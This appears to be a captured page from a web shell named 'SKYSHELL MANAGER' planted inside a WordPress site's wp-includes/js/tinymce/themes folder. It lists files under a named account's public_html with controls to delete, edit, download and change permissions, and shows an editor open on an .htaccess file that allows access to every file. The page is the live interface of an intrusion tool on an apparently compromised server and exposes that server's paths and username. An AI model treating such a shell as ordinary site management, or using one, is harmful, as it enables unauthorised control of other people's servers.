📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
13590.18 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: _htaccess
# This file is auto generated by Matomo, do not edit directly # Please report any issue or improvement directly to the Matomo team. # Allow any file in this directory <Files "*"> <IfModule mod_version.c> <IfVersion < 2.4> Order Allow,Deny Allow from All </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </IfModule> <IfModule !mod_version.c> <IfModule !mod_authz_core.c> Order Allow,Deny Allow from All </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </IfModule> </Files> # do not cache preview container files <Files ~ "^container_.*_preview\.js$"> <IfModule mod_headers.c> Header set Cache-Control "Cache-Control: private, no-cache, no-store" </IfModule> </Files>
Save